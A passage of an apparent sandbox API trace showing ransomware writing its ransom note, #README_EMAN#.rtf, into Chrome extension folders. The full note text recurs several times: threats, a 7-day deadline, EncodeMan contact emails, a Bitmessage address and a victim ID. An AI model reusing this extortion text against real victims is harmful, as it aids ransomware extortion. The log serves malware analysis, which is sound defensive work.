{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.301] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.304] CloseHandle (hObject=0x294) returned 1 [0285.304] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0285.304] GetLastError () returned 0x2 [0285.304] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.305] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.305] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 